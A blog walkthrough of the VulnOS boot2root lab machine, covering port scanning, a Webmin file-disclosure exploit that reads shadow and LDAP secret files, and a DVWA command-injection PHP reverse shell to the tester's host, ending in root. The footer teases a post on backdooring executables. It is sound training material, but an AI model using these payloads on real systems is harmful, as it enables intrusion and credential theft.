boot2root: VulnOS

A little bit dated now, but I hadn't actually run through this one so I thought I'd document it as I did!

As usual, starting with a:
netdiscover -i eth0

We discover that the machine is running on 192.168.56.103.

Next we run an nmap scan:
root@kali:~# nmap -sS -T4 -A 192.168.56.103 -p 1-65535

The name "VulnOS" is certainly not a lie!
root@kali:~# nmap -sS -T4 -A 192.168.56.103 -p 1-65535

Starting Nmap 7.00 ( https://nmap.org ) at 2015-11-24 18:41 GMT
Nmap scan report for 192.168.56.103
Host is up (0.00017s latency).
Not shown: 65507 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 43:a6:84:8d:be:1a:ee:fb:ed:c3:23:53:14:14:8f:50 (DSA)
|_  2048 30:1d:2d:c4:9e:66:d8:bd:70:7c:48:84:fb:b9:7b:09 (RSA)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
|_smtp-commands: VulnOS.home, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=VulnOS.home
| Not valid before: 2014-03-09T14:00:56
|_Not valid after:  2024-03-06T14:00:56
|_ssl-date: 2015-11-24T18:41:33+00:00; -2s from scanner time.
53/tcp    open  domain      ISC BIND 9.7.0-P1
| dns-nsid: 
|_  bind.version: 9.7.0-P1
80/tcp    open  http        Apache httpd 2.2.14 ((Ubuntu))
|_http-server-header: Apache/2.2.14 (Ubuntu)
|_http-title: index
110/tcp   open  pop3        Dovecot pop3d
|_pop3-capabilities: TOP STLS SASL CAPA UIDL PIPELINING RESP-CODES
| ssl-cert: Subject: commonName=VulnOS.home
| Not valid before: 2014-03-09T14:00:56
|_Not valid after:  2024-03-06T14:00:56
|_ssl-date: 2015-11-24T18:41:35+00:00; -2s from scanner time.
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41687/udp  mountd
|   100005  1,2,3      42277/tcp  mountd
|   100021  1,3,4      33701/tcp  nlockmgr
|   100021  1,3,4      46240/udp  nlockmgr
|   100024  1          42901/udp  status
|_  100024  1          59538/tcp  status
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
143/tcp   open  imap        Dovecot imapd
|_imap-capabilities: QRESYNC ESEARCH THREAD=REFS CONTEXT=SEARCH Capability THREAD=REFERENCES OK MULTIAPPEND SORT ESORT UNSELECT SORT=DISPLAY ID SEARCHRES IDLE STARTTLS completed WITHIN LOGINDISABLEDA0001 CONDSTORE ENABLE I18NLEVEL=1 UIDPLUS LITERAL+ LIST-EXTENDED SASL-IR NAMESPACE CHILDREN IMAP4rev1 LOGIN-REFERRALS
| ssl-cert: Subject: commonName=VulnOS.home
| Not valid before: 2014-03-09T14:00:56
|_Not valid after:  2024-03-06T14:00:56
|_ssl-date: 2015-11-24T18:41:34+00:00; -2s from scanner time.
389/tcp   open  ldap        OpenLDAP 2.2.X - 2.3.X
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  shell       Netkit rshd
901/tcp   open  http        Samba SWAT administration server
| http-auth: 
| HTTP/1.0 401 Authorization Required
|_  Basic realm=SWAT
|_http-title: 401 Authorization Required
993/tcp   open  ssl/imap    Dovecot imapd
|_imap-capabilities: QRESYNC ESEARCH THREAD=REFS CONTEXT=SEARCH Capability THREAD=REFERENCES OK MULTIAPPEND SORT ESORT UNSELECT SORT=DISPLAY ID AUTH=LOGINA0001 IDLE AUTH=PLAIN completed WITHIN SEARCHRES CONDSTORE ENABLE I18NLEVEL=1 UIDPLUS LITERAL+ LIST-EXTENDED SASL-IR NAMESPACE CHILDREN IMAP4rev1 LOGIN-REFERRALS
| ssl-cert: Subject: commonName=VulnOS.home
| Not valid before: 2014-03-09T14:00:56
|_Not valid after:  2024-03-06T14:00:56
|_ssl-date: 2015-11-24T18:41:34+00:00; -2s from scanner time.
| sslv2: 
|   SSLv2 supported
|_  ciphers: none
995/tcp   open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: TOP SASL(PLAIN LOGIN) USER CAPA UIDL PIPELINING RESP-CODES
| ssl-cert: Subject: commonName=VulnOS.home
| Not valid before: 2014-03-09T14:00:56
|_Not valid after:  2024-03-06T14:00:56
|_ssl-date: 2015-11-24T18:41:35+00:00; -2s from scanner time.
| sslv2: 
|   SSLv2 supported
|_  ciphers: none
2000/tcp  open  sieve       Dovecot timsieved
2049/tcp  open  nfs         2-4 (RPC #100003)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41687/udp  mountd
|   100005  1,2,3      42277/tcp  mountd
|   100021  1,3,4      33701/tcp  nlockmgr
|   100021  1,3,4      46240/udp  nlockmgr
|   100024  1          42901/udp  status
|_  100024  1          59538/tcp  status
3306/tcp  open  mysql       MySQL 5.1.73-0ubuntu0.10.04.1
| mysql-info: 
|   Protocol: 53
|   Version: .1.73-0ubuntu0.10.04.1
|   Thread ID: 311
|   Capabilities flags: 63487
|   Some Capabilities: DontAllowDatabaseTableColumn, ConnectWithDatabase, Speaks41ProtocolOld, LongPassword, Support41Auth, IgnoreSpaceBeforeParenthesis, SupportsCompression, SupportsTransactions, Speaks41ProtocolNew, InteractiveClient, IgnoreSigpipes, SupportsLoadDataLocal, LongColumnFlag, ODBCClient, FoundRows
|   Status: Autocommit
|_  Salt: 2*}W}0ssh/N}LBDm{CxW
3632/tcp  open  tcpwrapped
6667/tcp  open  irc         IRCnet ircd
| irc-info: 
|   users: 1
|   servers: 1
|   chans: 15
|   lusers: 1
|   lservers: 0
|   server: irc.localhost
|   version: 2.11.2p1. irc.localhost 000A 
|   uptime: 0 days, 0:02:04
|   source ident: NONE or BLOCKED
|   source host: 192.168.56.102
|_  error: Closing Link: yjlqbpihq[~nmap@192.168.56.102] ("")
8070/tcp  open  unknown
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|_  Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
|_http-server-header: MiniServ/0.01
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
33701/tcp open  nlockmgr    1-4 (RPC #100021)
42277/tcp open  mountd      1-3 (RPC #100005)
59538/tcp open  status      1 (RPC #100024)
MAC Address: 08:00:27:43:06:19 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 1 hop
Service Info: Hosts:  VulnOS.home, irc.localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: VULNOS, NetBIOS user: , NetBIOS MAC:  (unknown)

TRACEROUTE
HOP RTT     ADDRESS
1   0.17 ms 192.168.56.103

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.01 seconds

The award for the longest nmap output I've ever seen for a boot2root challenge is certainly going to go to this one.
It's hard not to be a little overwhelmed by this output, but if we start at the top and do a quick Google on the versions involved we should get somewhere.
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 43:a6:84:8d:be:1a:ee:fb:ed:c3:23:53:14:14:8f:50 (DSA)
|_  2048 30:1d:2d:c4:9e:66:d8:bd:70:7c:48:84:fb:b9:7b:09 (RSA)

From a cursory Google this doesn't seem vulnerable.

23/tcp    open  telnet      Linux telnetd

This is potentially vulnerable to Telnetd encrypt_keyid.
25/tcp    open  smtp        Postfix smtpd
|_smtp-commands: VulnOS.home, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=VulnOS.home
| Not valid before: 2014-03-09T14:00:56
|_Not valid after:  2024-03-06T14:00:56
|_ssl-date: 2015-11-24T18:41:33+00:00; -2s from scanner time.

There's a good chance this is vulnerable to Postfix SMTP Shellshock, and a lesser chance it may be vulnerable to GLD Greylisting Buffer Overflow.

53/tcp    open  domain      ISC BIND 9.7.0-P1
| dns-nsid: 
|_  bind.version: 9.7.0-P1

There doesn't seem to be much in the way of useful exploits available for this, just a few DoS exploits.

80/tcp    open  http        Apache httpd 2.2.14 ((Ubuntu))
|_http-server-header: Apache/2.2.14 (Ubuntu)
|_http-title: index

Let's fire nikto at this to see if we can get a bit more detail.
nikto -host 192.168.56.103

Nothing from the output immediately catches the eye other than that phpyMyAdmin appears to be accessible in the default directory.
Let's have a look at the website to see if there's any info we can glean.

Sensible advice, but nothing to exploit on this page.
The next page is marginally more interesting:

Somebody likes the X-Files, probably worth bearing in mind.
Nothing particularly interesting in the source code other than the existence of an "imgs" directory, but the only thing in there is the X image shown at the bottom of the page.
Time to point dirbuster at the site and make a sandwich whilst it runs.
phpymadmin, phppgadmin, phpgroupware, egroupware and phpsysinfo were found on the web server as directories.
There are not any immediately obvious exploits available for these, but phpsysinfo has some information we may find useful later:

Continuing down the list:
110/tcp   open  pop3        Dovecot pop3d
|_pop3-capabilities: TOP STLS SASL CAPA UIDL PIPELINING RESP-CODES
| ssl-cert: Subject: commonName=VulnOS.home
| Not valid before: 2014-03-09T14:00:56
|_Not valid after:  2024-03-06T14:00:56
|_ssl-date: 2015-11-24T18:41:35+00:00; -2s from scanner time.

Initial testing shows this not to be vulnerable to the Metasploit exim4_dovecot_exec module, though playing with the settings may have more success. Worth coming back to if we get stuck elsewhere.
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41687/udp  mountd
|   100005  1,2,3      42277/tcp  mountd
|   100021  1,3,4      33701/tcp  nlockmgr
|   100021  1,3,4      46240/udp  nlockmgr
|   100024  1          42901/udp  status
|_  100024  1          59538/tcp  status

Nothing unusual here.

139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

Samba 3.4.7 is likely to be pretty secure, but may have a critical CVE 2012-1182.
Sadly, this server has been patched:
msf exploit(setinfopolicy_heap) > exploit

[*] Started reverse handler on 192.168.56.102:4444 
[*] Trying to exploit Samba with address 0xb67f1000...
[*] Trying to exploit Samba with address 0xb67f2000...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0xb67f3000...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0xb67f4000...
[*] Trying to exploit Samba with address 0xb67f5000...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0xb67f6000...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0xb67f7000...
[-] Server is most likely patched...

Moving on!

143/tcp   open  imap        Dovecot imapd
|_imap-capabilities: QRESYNC ESEARCH THREAD=REFS CONTEXT=SEARCH Capability THREAD=REFERENCES OK MULTIAPPEND SORT ESORT UNSELECT SORT=DISPLAY ID SEARCHRES IDLE STARTTLS completed WITHIN LOGINDISABLEDA0001 CONDSTORE ENABLE I18NLEVEL=1 UIDPLUS LITERAL+ LIST-EXTENDED SASL-IR NAMESPACE CHILDREN IMAP4rev1 LOGIN-REFERRALS
| ssl-cert: Subject: commonName=VulnOS.home
| Not valid before: 2014-03-09T14:00:56
|_Not valid after:  2024-03-06T14:00:56
|_ssl-date: 2015-11-24T18:41:34+00:00; -2s from scanner time.

This is the Dovecot server again. Possibly worth further investigation but I'll skip over it on this pass.

389/tcp   open  ldap        OpenLDAP 2.2.X - 2.3.X

Unfortunately there only seems to be DoS vulnerabilities for this version - not what we want to achieve.

445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

Samba again, same as before.

512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  shell       Netkit rshd

514 is a shell but is password protected.

901/tcp   open  http        Samba SWAT administration server
| http-auth: 
| HTTP/1.0 401 Authorization Required
|_  Basic realm=SWAT
|_http-title: 401 Authorization Required

Running a web server but requires basic auth. A quick google suggests you require the root user's password for this.

2000/tcp  open  sieve       Dovecot timsieved

Dovecot again.

2049/tcp  open  nfs         2-4 (RPC #100003)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41687/udp  mountd
|   100005  1,2,3      42277/tcp  mountd
|   100021  1,3,4      33701/tcp  nlockmgr
|   100021  1,3,4      46240/udp  nlockmgr
|   100024  1          42901/udp  status
|_  100024  1          59538/tcp  status

This has the potential to be interesting. There's a post on exploiting NFS here.
Unfortunately, no shares are exposed:
root@kali:~/vulnos# showmount -e 192.168.56.103
Export list for 192.168.56.103:



3306/tcp  open  mysql       MySQL 5.1.73-0ubuntu0.10.04.1
| mysql-info: 
|   Protocol: 53
|   Version: .1.73-0ubuntu0.10.04.1
|   Thread ID: 311
|   Capabilities flags: 63487
|   Some Capabilities: DontAllowDatabaseTableColumn, ConnectWithDatabase, Speaks41ProtocolOld, LongPassword, Support41Auth, IgnoreSpaceBeforeParenthesis, SupportsCompression, SupportsTransactions, Speaks41ProtocolNew, InteractiveClient, IgnoreSigpipes, SupportsLoadDataLocal, LongColumnFlag, ODBCClient, FoundRows
|   Status: Autocommit
|_  Salt: 2*}W}0ssh/N}LBDm{CxW

Unfortunately 5.1.73 is the version that patched a lot of major issues.
There's potentially still an attack vector in here, but as this is a quick first pass let's move on.

3632/tcp  open  tcpwrapped

TCPWrapped ports are programs that are protected by tcpwrapping. In short, a TCP handshake was completed but the remote host closed the connection without receiving any data.

6667/tcp  open  irc         IRCnet ircd
| irc-info: 
|   users: 1
|   servers: 1
|   chans: 15
|   lusers: 1
|   lservers: 0
|   server: irc.localhost
|   version: 2.11.2p1. irc.localhost 000A 
|   uptime: 0 days, 0:02:04
|   source ident: NONE or BLOCKED
|   source host: 192.168.56.102
|_  error: Closing Link: yjlqbpihq[~nmap@192.168.56.102] ("")

Doesn't appear to be vulnerable. Not sure why there's an IRC server running though!

8070/tcp  open  unknown

Not sure what this is, and connecting with netcat doesn't give any more information.

8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|_  Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat

Apache Tomcat instance. Requires login for the management pages. If we can get access to the /conf/tomcat-users.xml file later this may be useful.

10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
|_http-server-header: MiniServ/0.01
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).

Aha, Webmin. Metasploit has an exploit for Webmin which allows file disclosure.
Running this we're able to get the /etc/passwd and /etc/shadow files. Unfortunately, attempting to crack them hasn't really worked out for me.
Taking another look at the webserver, I pointed DIRB at it and found /drupal6. The page returned displays a list of other installed apps, including "Damn Vulnerable Web Application".


Trying the default credentials (admin/password) for this, we are able to log in.
We can then lower the security mode on DVWA to "Low" and use the Command Execution section.
Attempting to connect back to ourselves where we are hosting netcat (nc -lvvp 4444) with ";netcat 192.168.56.102 4444" works, but adding -e does not. This suggests that the server does not have -e enabled.
There's a few different ways around this, but the most popular is to use 
; php -r '$sock=fsockopen("192.168.56.102",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
in order to launch the shell from PHP instead.

And we've got a limited shell!
After an embarrassing length of time trying to get a local privilege escalation exploit that works I remembered the server had OpenLDAP running. OpenLDAP requires a file containing the password of the user named in /etc/ldap.conf to be held on client machines in /etc/ldap.secret. Using the Webmin file inclusion exploit we get the password "canuhackme" from LDAP.
Testing this against the unshadowed file from earlier, we get a match for the user "vulnosadmin"!

Connecting via SSH, we discover the user can sudo and switch to the root account.
root@kali:~/vulnos# ssh vulnosadmin@192.168.56.103
vulnosadmin@192.168.56.103's password: 
Linux VulnOS 2.6.32-57-generic-pae #119-Ubuntu SMP Wed Feb 19 01:20:04 UTC 2014 i686 GNU/Linux
Ubuntu 10.04.4 LTS

Welcome to Ubuntu!
 * Documentation:  https://help.ubuntu.com/

  System information as of Sun Nov 29 00:13:01 CET 2015

  System load:  0.04               Processes:           136
  Usage of /:   26.6% of 23.06GB   Users logged in:     0
  Memory usage: 50%                IP address for eth0: 192.168.56.103
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

New release 'precise' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Wed Mar 19 17:31:44 2014 from 192.168.1.3
vulnosadmin@VulnOS:~$ id
uid=1000(vulnosadmin) gid=1000(vulnosadmin) groepen=4(adm),20(dialout),24(cdrom),46(plugdev),109(lpadmin),110(sambashare),111(admin),1000(vulnosadmin)
vulnosadmin@VulnOS:~$ sudo su
[sudo] password for vulnosadmin: 
root@VulnOS:/home/vulnosadmin# id
uid=0(root) gid=0(root) groepen=0(root)

And we cat the flag
root@VulnOS:/home/vulnosadmin# ls
Maildir  vuln
root@VulnOS:/home/vulnosadmin# cd /root
root@VulnOS:~# ls
hello.txt
root@VulnOS:~# cat hello.txt
Hello,

So you got root... You still need to find the rest of the vulnerabilities inside the OS !

TRY HARDER !!!!!!!

Success!
I normally don't include the entire process (and I've probably missed a whole load of exploits given that I found the limited shell on my "initial" pass, so wasn't aiming too deep), but this should at least show the methodology involved in not getting stuck up on one area for too long.
Thanks to c4b3rw0lf for creating the VM.

Comments

Post a Comment

Popular posts from this blog

Using mana toolkit and BDFProxy to backdoor executables on the fly

Image
A week or so back, DecidedlyGray put up a post about using Kali Nethunter, Mana and BDFProxy to backdoor executables on the fly on a rogue Access Point. I'm going to recreate the same AP in Kali 2.0 in this post. First up you need to install the mana toolkit with apt-get install mana-toolkit This will install the toolkit and set up some of the basic configs. If you navigate to /usr/share/mana-toolkit/run-mana you will see the runscripts. I had a little play with the start-nat-full.sh script but had issues with SSLStrip, so resolved to use the non-SSL script start-nat-simple.sh First up, copy start-nat-simple.sh to a new script with: cp start-nat-simple.sh start-nat-simple-bdfproxy.sh In this file I didn't make many changes other than to change the physical and upstream interfaces to the ones I use on my Kali VM (eth1 for upstream and wlan0 for phy), and to add the entry required for the redirect to BDFProxy iptables -t nat -A PREROUTING -i $phy -p tcp --dest...
Keep reading

boot2root: Tr0ll

Image
Tr0ll: https://www.vulnhub.com/entry/tr0ll-1,100/ I guessed from the name & that it was "inspired by OSCP" that there'd be some curveballs in this boot2root, but I didn't anticipate how many! As usual, beginning with a netdiscover: And following up with an nmap: FTP allows anonymous access - that's interesting. Will come back to that! For now, let's browse the web app. Looks like we found the first troll... The nmap scan showed that there was an entry in the robots.txt, let's have a look: Ah. Not much more helpful. Nothing useful in the source code for either page either. Let's move on to the anonymous FTP. We found a file called "lol.pcap" which is a pcap-ng capture file. Let's open it up in wireshark and see what it contains. Looks like it's a packet capture of someone using the FTP server: In the capture we can see a request for the file listing, which shows a file called secret...
Keep reading